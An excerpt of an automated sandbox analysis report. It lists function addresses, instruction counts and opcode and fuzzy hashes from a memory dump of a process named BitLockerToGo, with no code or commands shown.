                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 77897a978281c6e62a68f60fbda1dd05a9de1741ab7495d51e2174554a496b31
                • Instruction ID: 137b7588f924467820da2fa36fcee884c46118c035e2d4d5a302e8d6ab9e52f9
                • Opcode Fuzzy Hash: 77897a978281c6e62a68f60fbda1dd05a9de1741ab7495d51e2174554a496b31
                • Instruction Fuzzy Hash: 89A1F675604B41CFC325CF38C490B92B7E2FF9A315F194A6DD8A68B792D735A849CB40
                Function 00262CC0 Relevance: .2, Instructions: 192COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e242761953c6edb62a277dc0dd629e6b080038304fd9b688f905b25d1d98600
                • Instruction ID: 5312d087b2b2bbdbe13b730fb06ad45aea7367f7dcb8feb9194218007107a830
                • Opcode Fuzzy Hash: 8e242761953c6edb62a277dc0dd629e6b080038304fd9b688f905b25d1d98600
                • Instruction Fuzzy Hash: DD619EB55087548FE310DF29D89035BBBE1BBC8358F044A2DE5E987391E379DA488F92
                Function 00232CA0 Relevance: .2, Instructions: 189COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 96a1be833e4fedff33bf1373e799afc0129166239b85ee2cd1ddc06d011e721b
                • Instruction ID: e88a824bc39d0cd5d984acaeabb89a423a003c56b55b1e8d7efdc6d230fce201
                • Opcode Fuzzy Hash: 96a1be833e4fedff33bf1373e799afc0129166239b85ee2cd1ddc06d011e721b
                • Instruction Fuzzy Hash: A651F6B0504205DFD704AF68FD0971BBBA1FF40318F088639E85AD66A1E775E978CB86
                Function 002537FE Relevance: .2, Instructions: 170COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a816a7074a83e9da863b80ff68aeb835d7d9ccb8d586ae41367d58cc7121a1a
                • Instruction ID: e30c1c044e484fa918e16f86e97acdaf59d4be9297d86fa9814061ff1bc1a052
                • Opcode Fuzzy Hash: 2a816a7074a83e9da863b80ff68aeb835d7d9ccb8d586ae41367d58cc7121a1a
                • Instruction Fuzzy Hash: D151E4B1A183018FC718CF28C89062AB7E2FFC9314F19862DE88A9B395D734ED15CB55
                Function 00256A83 Relevance: .1, Instructions: 146COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76717db16c56d4573ae44454bcc0e6b4fdfb5f2597146a6669d1fab15071936c
                • Instruction ID: ac19fc569e5835849dfb7eb30b33f4a62556ea8e5d3dc6ddbe9681ecaaed4b02
                • Opcode Fuzzy Hash: 76717db16c56d4573ae44454bcc0e6b4fdfb5f2597146a6669d1fab15071936c
                • Instruction Fuzzy Hash: C65169701107418FDB258F24C4D4B22BBF1BF06305F18899CD89A9B786CBB5E859CBA5
                Function 00245A90 Relevance: .1, Instructions: 146COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1da209b17b01932e3b05467e7b292eb36af367a4f5526fb592f0d38a06d77a98
                • Instruction ID: 5f6f569198193ac5e0cdb82c034a0dec99fa37c0ccb1a575d8c664fca4621058
                • Opcode Fuzzy Hash: 1da209b17b01932e3b05467e7b292eb36af367a4f5526fb592f0d38a06d77a98
                • Instruction Fuzzy Hash: B14148B2928B298BD3259F54C8C0726F7D8EF61318F094669E8C947283EB71DC24C752
                Function 0023F300 Relevance: .1, Instructions: 126COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: efe868ee5ba58c5bef0459794eba2dbd496e49c224836a1f8003f6dd08ea4d3a
                • Instruction ID: 489eee55b43af34d753f1a3bc2198b35fe10394c8af40d33cb73487fc6ffdd1c
                • Opcode Fuzzy Hash: efe868ee5ba58c5bef0459794eba2dbd496e49c224836a1f8003f6dd08ea4d3a
                • Instruction Fuzzy Hash: 554117B2A182604FE3488E39D59037ABBD2DFC9350F05867DF1E9873D1C6788845EB11
                Function 0026FACD Relevance: .1, Instructions: 106COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b41b96781d23829e2df609b6ce1633b3bf422ab2bb4ed606be739754ddd4995d
                • Instruction ID: a25cdb1854995a45bc617a4837d22dd9654c7102f2bccb8378ec939a06858b5e
                • Opcode Fuzzy Hash: b41b96781d23829e2df609b6ce1633b3bf422ab2bb4ed606be739754ddd4995d
                • Instruction Fuzzy Hash: 6D41A9A646DBC25FCB43C7388CFA680BF70AD1320534E61DFC0818F497D619A829E756
                Function 002504D6 Relevance: .1, Instructions: 87COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 905e6ff41130ed2f69832d99538fbac8ad211432f811d5c02125e523ae7de41b
                • Instruction ID: 06136ab4ce5d419df85cc6da42f892cd0344d93c32645877c60b34649ae900eb
                • Opcode Fuzzy Hash: 905e6ff41130ed2f69832d99538fbac8ad211432f811d5c02125e523ae7de41b
                • Instruction Fuzzy Hash: 1A117C30614B018FD728CF15C8D4A37B7E2BB89312F94991CD4DB07A65E730E885CB58
                Function 002403C8 Relevance: .1, Instructions: 84COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a446bb6d51ed20c487d07830c3fc52519b522961cbdca932543cfbef497af478
                • Instruction ID: f86f23ea02d0797c9cdea6271e4f403ff42a0f3f5fb0bf157ad0d53791ae0b6e
                • Opcode Fuzzy Hash: a446bb6d51ed20c487d07830c3fc52519b522961cbdca932543cfbef497af478
                • Instruction Fuzzy Hash: D931E3711687419BD318DF14C8A4A6FB3E2FFC5308F548A1DE58A132A1CB70AD96CF82
                Function 00260B80 Relevance: .1, Instructions: 64COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                • Instruction ID: 7789e973b11ddd731561f600723d51bde43e4826aeefb262e085635853d896f4
                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                • Instruction Fuzzy Hash: 77110C33A251D54EC3168D3C8450667BFA30AA3239F5D8399F4F59B2D2D6238DCBA354
                Function 00255920 Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4c49112d934dcffccd5e1c29842df051fe1fc1f71b2fbc50dc5ac815b336ea4f
                • Instruction ID: 7258d20d370e6029e275e1b1f7115733242c1c1cc471895f2bed79ee9eb896fa
                • Opcode Fuzzy Hash: 4c49112d934dcffccd5e1c29842df051fe1fc1f71b2fbc50dc5ac815b336ea4f
                • Instruction Fuzzy Hash: EC01B5F1620B5387DB209E14D4E077BF2A9AF44729F08002CEC099B201DB79FC2986D9
                Function 00233510 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3c42958cf081c73a235c3fdb2ae9f6623085816a4b10f424cfb641ab42021d86
                • Instruction ID: 12e4c9696e99212f53c9626bd2aeedce5cf63f9bba42b6d5db47e53f3689d8dd
                • Opcode Fuzzy Hash: 3c42958cf081c73a235c3fdb2ae9f6623085816a4b10f424cfb641ab42021d86
                • Instruction Fuzzy Hash: A1F02E777352161BA320CD6AECC0937F356D7CD654F1A503DE581D3601C571EE129390
                Function 0023C113 Relevance: .0, Instructions: 24COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 60e3998aa491883378bed81065d5de250d8eddc4a97dd8f0c60c9f1a266c8c84
                • Instruction ID: 539a0eeffdac98e8dfc297ab1708a8d43ab128ac0859ecbd2f289cb064f43d58
                • Opcode Fuzzy Hash: 60e3998aa491883378bed81065d5de250d8eddc4a97dd8f0c60c9f1a266c8c84
                • Instruction Fuzzy Hash: C0E0DF742053824FD7594F22E868B233BB09B47210F06D42DD443C7691C674D840CB14
                Function 0023E2D0 Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                • Instruction ID: 42e71289043893d4359e32e950a8f69caec7ff62920eec2ef020d8a8eea0d04f
                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                • Instruction Fuzzy Hash: 27D0A7B15487B20E5B588D3804A0977FBECE987652F18149EF8D1E3145D220DC16869D
                Function 0024F283 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 152f3d6da3e5575bbc73eb3aa325bd4325eff911f681030466b80362a5b34b9e
                • Instruction ID: d0bc14a84512e6653e09f8dde52d1498a50c1e468d528054ec252232bf9ed5d8
                • Opcode Fuzzy Hash: 152f3d6da3e5575bbc73eb3aa325bd4325eff911f681030466b80362a5b34b9e
                • Instruction Fuzzy Hash: DDB092E5C126918A91212A103C134EBF0260A1325EF082030F80A66212AA26D26B499F